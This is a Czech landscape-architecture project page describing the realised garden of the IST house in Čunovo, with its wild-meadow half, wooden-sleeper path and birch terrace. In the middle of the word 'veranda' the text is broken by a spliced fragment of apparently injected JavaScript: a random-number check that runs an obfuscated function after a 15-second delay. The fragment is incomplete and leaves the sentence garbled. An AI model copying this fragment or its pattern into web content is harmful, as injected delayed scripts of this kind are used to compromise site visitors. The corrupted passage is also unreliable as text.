Galerie projektu

Zahrada domu IST v Čunově

Návrh zahrady se snaží respektovat architekturu domu, a náležitě na to navazuje. Dům je řešen v duchu venkovského domu skloubeného s dnešní, moderní architekturou. Prodloužený tvar je odkazem na někdejší tvarosloví domů, kdy byla častou součástí domů verandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda nebo slovensky „gánok“. Koncept zahrady tento detail zvýrazňuje.

Zahrada je rozdělena na dvě poloviny, přičemž levá polovina má charakterizovat divokou přírodu prostřednictvím květnatých záhonů s vysokým podílem travin. Záměrem je různorodost během celého roku, aby se obyvatelé domu těšili na každé roční období. Na jaře zde kvetou jarní cibuloviny, v létě luční květy a na podzim množství trav. V zimě si záhony také udržují charakteristickou strukturu. Ústředním prvkem je chodník z dřevěných pražců, který vede od začátku až po konec zahrady a dřevěná terasa s břízou uprostřed květinového záhonu.

  • Stav projektu: po realizaci

Naše projekty

{{project.title}}

{{project.location}}

Nahrávam

Přehled všech projektů


Kontaktujte nás

V případě, že máte dotazy, potřebujete konzultovat svůj záměr, nebo chcete usměrnit svou představu, neváhejte se na nás obrátit. Jsme připraveni se s Vámi podelit o naše nápady a zkušenosti. Anebo nám napište jen tak.

Napište nám